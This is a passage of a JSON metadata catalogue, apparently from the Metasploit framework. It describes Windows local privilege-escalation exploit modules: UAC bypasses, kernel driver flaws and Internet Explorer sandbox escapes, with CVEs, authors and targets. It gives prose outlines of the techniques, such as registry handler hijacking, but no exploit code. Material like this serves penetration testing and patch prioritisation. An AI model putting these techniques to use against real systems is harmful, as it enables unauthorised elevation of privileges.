"description": "This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under\n the Current User hive, and inserting a custom command that will get invoked when any binary\n (.exe) application is launched. slui.exe is an auto-elevated binary that is vulnerable\n to file handler hijacking. When we run slui.exe with the changed Registry key\n (HKCU:\\Software\\Classes\\exefile\\shell\\open\\command), it will run our custom command as Admin\n instead of slui.exe.\n\n The module modifies the registry in order for this exploit to work. The modification is\n reverted once the exploitation attempt has finished.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting the\n payload in a different process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2018-05-23 12:53:48 +0000",
"path": "/modules/exploits/windows/local/bypassuac_sluihijack.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_sluihijack",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_vbs": {
"name": "Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)",
"full_name": "exploit/windows/local/bypassuac_vbs",
"rank": 600,
"disclosure_date": "2015-08-22",
"type": "exploit",
"author": [
"Vozzie",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will bypass Windows UAC by utilizing the missing .manifest on the script host\n cscript/wscript.exe binaries.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/bypassuac_vbs.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_vbs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/capcom_sys_exec": {
"name": "Windows Capcom.sys Kernel Execution Exploit (x64 only)",
"full_name": "exploit/windows/local/capcom_sys_exec",
"rank": 300,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"TheWack0lian",
"OJ Reeves"
],
"description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n arbitrary function to be executed in the kernel from user land. This function\n purposely disables SMEP prior to invoking a function given by the caller.\n This has been tested on Windows 7, 8.1 and Windows 10 (x64).",
"references": [
"URL-https://twitter.com/TheWack0lian/status/779397840762245124"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64 (<= 10)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/capcom_sys_exec.rb",
"is_install_path": true,
"ref_name": "windows/local/capcom_sys_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/current_user_psexec": {
"name": "PsExec via Current User Token",
"full_name": "exploit/windows/local/current_user_psexec",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>",
"jabra"
],
"description": "This module uploads an executable file to the victim system, creates\n a share containing that executable, creates a remote service on each\n target system using a UNC path to that file, and finally starts the\n service(s).\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/current_user_psexec.rb",
"is_install_path": true,
"ref_name": "windows/local/current_user_psexec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/cve_2017_8464_lnk_lpe": {
"name": "LNK Code Execution Vulnerability",
"full_name": "exploit/windows/local/cve_2017_8464_lnk_lpe",
"rank": 600,
"disclosure_date": "2017-06-13",
"type": "exploit",
"author": [
"Uncredited",
"Yorick Koster",
"Spencer McIntyre"
],
"description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n\n The PATH option must be an absolute path to a writeable directory which is indexed for\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.",
"references": [
"CVE-2017-8464",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464",
"URL-http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt",
"URL-https://msdn.microsoft.com/en-us/library/dd871305.aspx",
"URL-http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm",
"URL-https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64",
"Windows x86"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb",
"is_install_path": true,
"ref_name": "windows/local/cve_2017_8464_lnk_lpe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-restarts"
],
"SideEffects": [
"artifacts-on-disk"
]
}
},
"exploit_windows/local/ikeext_service": {
"name": "IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL",
"full_name": "exploit/windows/local/ikeext_service",
"rank": 400,
"disclosure_date": "2012-10-09",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules'\n (IKEEXT) service which runs as SYSTEM, and starts automatically in default\n installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.",
"references": [
"URL-https://www.htbridge.com/advisory/HTB23108",
"URL-https://www.htbridge.com/vulnerability/uncontrolled-search-path-element.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ikeext_service.rb",
"is_install_path": true,
"ref_name": "windows/local/ikeext_service",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ipass_launch_app": {
"name": "iPass Mobile Client Service Privilege Escalation",
"full_name": "exploit/windows/local/ipass_launch_app",
"rank": 600,
"disclosure_date": "2015-03-12",
"type": "exploit",
"author": [
"h0ng10"
],
"description": "The named pipe, \\IPEFSYSPCPIPE, can be accessed by normal users to interact\n with the iPass service. The service provides a LaunchAppSysMode command which\n allows execution of arbitrary commands as SYSTEM.",
"references": [
"CVE-2015-0925",
"URL-https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/local/ipass_launch_app.rb",
"is_install_path": true,
"ref_name": "windows/local/ipass_launch_app",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/lenovo_systemupdate": {
"name": "Lenovo System Update Privilege Escalation",
"full_name": "exploit/windows/local/lenovo_systemupdate",
"rank": 600,
"disclosure_date": "2015-04-12",
"type": "exploit",
"author": [
"Michael Milvich",
"Sofiane Talmat",
"h0ng10"
],
"description": "The named pipe, \\SUPipeServer, can be accessed by normal users to interact with the\n System update service. The service allows arbitrary commands to be executed\n as SYSTEM if a valid security token is provided. This token can be generated\n by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please note that the\n System Update is stopped by default but can be started/stopped calling the Executable\n ConfigService.exe.",
"references": [
"OSVDB-121522",
"CVE-2015-2219",
"URL-http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/lenovo_systemupdate.rb",
"is_install_path": true,
"ref_name": "windows/local/lenovo_systemupdate",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/mov_ss": {
"name": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability",
"full_name": "exploit/windows/local/mov_ss",
"rank": 600,
"disclosure_date": "2018-05-08",
"type": "exploit",
"author": [
"Nick Peterson",
"Nemanja Mulasmajic",
"Can Bölük <can1357>",
"bwatters-r7"
],
"description": "This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kernels, resulting in unexpected behavior for #DB\n exceptions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to execute the final\n payload in order to gain remote code execution.",
"references": [
"CVE-2018-8897",
"EDB-44697",
"BID-104071",
"URL-https://github.com/can1357/CVE-2018-8897/",
"URL-https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2018-07-27 11:35:31 +0000",
"path": "/modules/exploits/windows/local/mov_ss.rb",
"is_install_path": true,
"ref_name": "windows/local/mov_ss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/mqac_write": {
"name": "MQAC.sys Arbitrary Write Privilege Escalation",
"full_name": "exploit/windows/local/mqac_write",
"rank": 200,
"disclosure_date": "2014-07-22",
"type": "exploit",
"author": [
"Matt Bergin",
"Spencer McIntyre"
],
"description": "A vulnerability within the MQAC.sys module allows an attacker to\n overwrite an arbitrary location in kernel memory.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process.",
"references": [
"CVE-2014-4971",
"EDB-34112",
"URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/mqac_write.rb",
"is_install_path": true,
"ref_name": "windows/local/mqac_write",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms10_015_kitrap0d": {
"name": "Windows SYSTEM Escalation via KiTrap0D",
"full_name": "exploit/windows/local/ms10_015_kitrap0d",
"rank": 500,
"disclosure_date": "2010-01-19",
"type": "exploit",
"author": [
"Tavis Ormandy",
"HD Moore",
"Pusscat",
"OJ Reeves"
],
"description": "This module will create a new session with SYSTEM privileges via the\n KiTrap0D exploit by Tavis Ormandy. If the session in use is already\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\n and is not supported on x64 editions of Windows.",
"references": [
"CVE-2010-0232",
"OSVDB-61854",
"MSB-MS10-015",
"EDB-11199",
"URL-https://seclists.org/fulldisclosure/2010/Jan/341"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2K SP4 - Windows 7 (x86)"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/local/ms10_015_kitrap0d.rb",
"is_install_path": true,
"ref_name": "windows/local/ms10_015_kitrap0d",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms10_092_schelevator": {
"name": "Windows Escalate Task Scheduler XML Privilege Escalation",
"full_name": "exploit/windows/local/ms10_092_schelevator",
"rank": 600,
"disclosure_date": "2010-09-13",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.\n When processing task files, the Windows Task Scheduler only uses a CRC32\n checksum to validate that the file has not been tampered with. Also, in a default\n configuration, normal users can read and write the task files that they have\n created. By modifying the task file and creating a CRC32 collision, an attacker\n can execute arbitrary commands with SYSTEM privileges.\n\n NOTE: Thanks to webDEViL for the information about disable/enable.",
"references": [
"OSVDB-68518",
"CVE-2010-3338",
"BID-44357",
"MSB-MS10-092",
"EDB-15589"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Vista, 7, and 2008"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms10_092_schelevator.rb",
"is_install_path": true,
"ref_name": "windows/local/ms10_092_schelevator",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms11_080_afdjoinleaf": {
"name": "MS11-080 AfdJoinLeaf Privilege Escalation",
"full_name": "exploit/windows/local/ms11_080_afdjoinleaf",
"rank": 200,
"disclosure_date": "2011-11-30",
"type": "exploit",
"author": [
"Matteo Memelli",
"Spencer McIntyre"
],
"description": "This module exploits a flaw in the AfdJoinLeaf function of the\n afd.sys driver to overwrite data in kernel space. An address\n within the HalDispatchTable is overwritten and when triggered\n with a call to NtQueryIntervalProfile will execute shellcode.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process before restoring its own token to\n avoid causing system instability.",
"references": [
"CVE-2011-2005",
"OSVDB-76232",
"EDB-18176",
"MSB-MS11-080",
"URL-http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP2 / SP3",
"Windows Server 2003 SP2"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb",
"is_install_path": true,
"ref_name": "windows/local/ms11_080_afdjoinleaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms13_005_hwnd_broadcast": {
"name": "MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",
"full_name": "exploit/windows/local/ms13_005_hwnd_broadcast",
"rank": 600,
"disclosure_date": "2012-11-27",
"type": "exploit",
"author": [
"Tavis Ormandy",
"Axel Souchet",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "Due to a problem with isolating window broadcast messages in the Windows kernel,\n an attacker can broadcast commands from a lower Integrity Level process to a\n higher Integrity Level process, thereby effecting a privilege escalation. This\n issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and\n RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+#\n does not work in Vista, so the attacker will have to check if the user is already\n running a command prompt and set SPAWN_PROMPT false.\n\n Three exploit techniques are available with this module. The WEB technique will\n execute a powershell encoded payload from a Web location. The FILE technique\n will drop an executable to the file system, set it to medium integrity and execute\n it. The TYPE technique will attempt to execute a powershell encoded payload directly\n from the command line, but may take some time to complete.",
"references": [
"CVE-2013-0008",
"MSB-MS13-005",
"OSVDB-88966",
"URL-http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb",
"is_install_path": true,
"ref_name": "windows/local/ms13_005_hwnd_broadcast",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms13_053_schlamperei": {
"name": "Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)",
"full_name": "exploit/windows/local/ms13_053_schlamperei",
"rank": 200,
"disclosure_date": "2013-12-01",
"type": "exploit",
"author": [
"Nils",
"Jon",
"Donato Capitella <donato.capitella@mwrinfosecurity.com>",
"Ben Campbell <ben.campbell@mwrinfosecurity.com>"
],
"description": "This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.\n The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).\n This allows any unprivileged process to freely migrate to winlogon.exe, achieving\n privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of Chrome's sandbox.\n NOTE: when a meterpreter session started by this exploit exits, winlogon.exe is likely to crash.",
"references": [
"CVE-2013-1300",
"MSB-MS13-053",
"URL-https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms13_053_schlamperei.rb",
"is_install_path": true,
"ref_name": "windows/local/ms13_053_schlamperei",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms13_081_track_popup_menu": {
"name": "Windows TrackPopupMenuEx Win32k NULL Page",
"full_name": "exploit/windows/local/ms13_081_track_popup_menu",
"rank": 200,
"disclosure_date": "2013-10-08",
"type": "exploit",
"author": [
"Seth Gibson",
"Dan Zentner",
"Matias Soler",
"Spencer McIntyre"
],
"description": "This module exploits a vulnerability in win32k.sys where under\n specific conditions TrackPopupMenuEx will pass a NULL pointer to\n the MNEndMenuState procedure. This module has been tested\n successfully on Windows 7 SP0 and Windows 7 SP1.",
"references": [
"CVE-2013-3881",
"OSVDB-98212",
"BID-62830",
"MSB-MS13-081",
"URL-http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html",
"URL-http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP0/SP1"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/ms13_081_track_popup_menu.rb",
"is_install_path": true,
"ref_name": "windows/local/ms13_081_track_popup_menu",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms13_097_ie_registry_symlink": {
"name": "MS13-097 Registry Symlink IE Sandbox Escape",
"full_name": "exploit/windows/local/ms13_097_ie_registry_symlink",
"rank": 500,
"disclosure_date": "2013-12-10",
"type": "exploit",
"author": [
"James Forshaw",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Internet Explorer sandbox which allows escaping\n Enhanced Protected Mode and executing code with Medium Integrity. The\n vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll\n component, which can be abused to force medium integrity IE to write to user-influenced keys.\n By using registry symlinks it's possible to force IE to add a policy entry in the registry\n and finally bypass Enhanced Protected Mode.",
"references": [
"CVE-2013-5045",
"MSB-MS13-097",
"BID-64115",
"URL-https://github.com/tyranid/IE11SandboxEscapes"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 8 - 11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb",
"is_install_path": true,
"ref_name": "windows/local/ms13_097_ie_registry_symlink",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms14_009_ie_dfsvc": {
"name": "MS14-009 .NET Deployment Service IE Sandbox Escape",
"full_name": "exploit/windows/local/ms14_009_ie_dfsvc",
"rank": 500,
"disclosure_date": "2014-02-11",
"type": "exploit",
"author": [
"James Forshaw",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a process creation policy in Internet Explorer's sandbox, specifically\n in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the\n Enhanced Protected Mode, and execute code with Medium Integrity.",
"references": [
"CVE-2014-0257",
"MSB-MS14-009",
"BID-65417",
"URL-https://github.com/tyranid/IE11SandboxEscapes"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IE 8 - 11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb",
"is_install_path": true,
"ref_name": "windows/local/ms14_009_ie_dfsvc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms14_058_track_popup_menu": {
"name": "Windows TrackPopupMenu Win32k NULL Pointer Dereference",
"full_name": "exploit/windows/local/ms14_058_track_popup_menu",
"rank": 300,
"disclosure_date": "2014-10-14",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"Spencer McIntyre",
"OJ Reeves <oj@buffered.io>"
],
"description": "This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability\n can be triggered through the use of TrackPopupMenu. Under special conditions, the\n NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary\n code execution. This module has been tested successfully on Windows XP SP3, Windows\n 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows\n 2008 R2 SP1 64 bits.",
"references": [
"CVE-2014-4113",
"OSVDB-113167",
"BID-70364",
"MSB-MS14-058",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/ms14_058_track_popup_menu.rb",
"is_install_path": true,
"ref_name": "windows/local/ms14_058_track_popup_menu",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms14_070_tcpip_ioctl": {
"name": "MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference",
"full_name": "exploit/windows/local/ms14_070_tcpip_ioctl",
"rank": 200,
"disclosure_date": "2014-11-11",
"type": "exploit",
"author": [
"Matt Bergin <level@korelogic.com>",
"Jay Smith <jsmith@korelogic.com>"
],
"description": "A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys\n can allow a local attacker to trigger a NULL pointer dereference by using a\n specially crafted IOCTL. This flaw can be abused to elevate privileges to\n SYSTEM.",
"references": [
"CVE-2014-4076",
"MSB-MS14-070",
"OSVDB-114532",
"URL-https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev",
"URL-https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Server 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb",
"is_install_path": true,
"ref_name": "windows/local/ms14_070_tcpip_ioctl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms15_004_tswbproxy": {
"name": "MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",
"full_name": "exploit/windows/local/ms15_004_tswbproxy",
"rank": 400,
"disclosure_date": "2015-01-13",
"type": "exploit",
"author": [
"Unknown",
"Henry Li",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a process creation policy in Internet Explorer's\n sandbox; specifically, Microsoft's RemoteApp and Desktop Connections runtime\n proxy, TSWbPrxy.exe. This vulnerability allows the attacker to escape\n Protected Mode and execute code with Medium Integrity. At the moment, this\n module only bypasses Protected Mode on Windows 7 SP1 and prior (32-bit). This\n module has been tested successfully on Windows 7 SP1 (32-bit) with IE 8 and IE\n 11.",
"references": [
"CVE-2015-0016",
"MSB-MS15-004",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Protected Mode (Windows 7) / 32 bits"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ms15_004_tswbproxy.rb",
"is_install_path": true,
"ref_name": "windows/local/ms15_004_tswbproxy",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms15_051_client_copy_image": {
"name": "Windows ClientCopyImage Win32k Exploit",
"full_name": "exploit/windows/local/ms15_051_client_copy_image",
"rank": 300,
"disclosure_date": "2015-05-12",
"type": "exploit",
"author": [
"Unknown",
"hfirefox",
"OJ Reeves",
"Spencer McIntyre"
],
"description": "This module exploits improper object handling in the win32k.sys kernel mode driver.\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\n Windows 2008 R2 SP1 x64.",
"references": [
"CVE-2015-1701",
"MSB-MS15-051",
"URL-https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html",
"URL-https://github.com/hfiref0x/CVE-2015-1701",
"URL-https://technet.microsoft.com/library/security/MS15-051"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/local/ms15_051_client_copy_image.rb",
"is_install_path": true,
"ref_name": "windows/local/ms15_051_client_copy_image",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-os-restarts"
]
}
},
"exploit_windows/local/ms15_078_atmfd_bof": {
"name": "MS15-078 Microsoft Windows Font Driver Buffer Overflow",
"full_name": "exploit/windows/local/ms15_078_atmfd_bof",
"rank": 0,
"disclosure_date": "2015-07-11",
"type": "exploit",
"author": [
"Eugene Ching",
"Mateusz Jurczyk",
"Cedric Halbronn",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a pool-based buffer overflow in the atmfd.dll driver when parsing\n a malformed font. The vulnerability was exploited by Hacking Team and disclosed in\n the July data leak. This module has been tested successfully on vulnerable builds of\n Windows 8.1 x64.",
"references": [
"CVE-2015-2426",
"CVE-2015-2433",
"MSB-MS15-078",
"MSB-MS15-080",
"URL-https://github.com/vlad902/hacking-team-windows-kernel-lpe",
"URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=369",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=480"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 8.1 x64"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/ms15_078_atmfd_bof.rb",
"is_install_path": true,
"ref_name": "windows/local/ms15_078_atmfd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_014_wmi_recv_notif": {
"name": "Windows WMI Receive Notification Exploit",
"full_name": "exploit/windows/local/ms16_014_wmi_recv_notif",
"rank": 300,
"disclosure_date": "2015-12-04",
"type": "exploit",
"author": [
"smmrootkit",
"de7ec7ed",
"de7ec7ed"
],
"description": "This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.\n This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.",
"references": [
"CVE-2016-0040",
"MSB-MS16-014",
"URL-https://github.com/de7ec7ed/CVE-2016-0040",
"URL-https://github.com/Rootkitsmm/cve-2016-0040",
"URL-https://technet.microsoft.com/en-us/library/security/ms16-014.aspx"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP0/SP1"
],
"mod_time": "2018-05-03 11:30:05 +0000",
"path": "/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_014_wmi_recv_notif",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_016_webdav": {
"name": "MS16-016 mrxdav.sys WebDav Local Privilege Escalation",
"full_name": "exploit/windows/local/ms16_016_webdav",
"rank": 600,
"disclosure_date": "2016-02-09",
"type": "exploit",
"author": [
"Tamas Koczka",
"William Webb <william_webb@rapid7.com>"
],
"description": "This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn\n a process on the target system and elevate its privileges to NT AUTHORITY\\SYSTEM before executing\n the specified payload within the context of the elevated process.",
"references": [
"CVE-2016-0051",
"MSB-MS16-016"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/ms16_016_webdav.rb",
"is_install_path": true,
"ref_name": "windows/local/ms16_016_webdav",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ms16_032_secondary_logon_handle_privesc": {
"name": "MS16-032 Secondary Logon Handle Privilege Escalation",
"full_name": "exploit/windows/local/ms16_032_secondary_logon_handle_privesc",
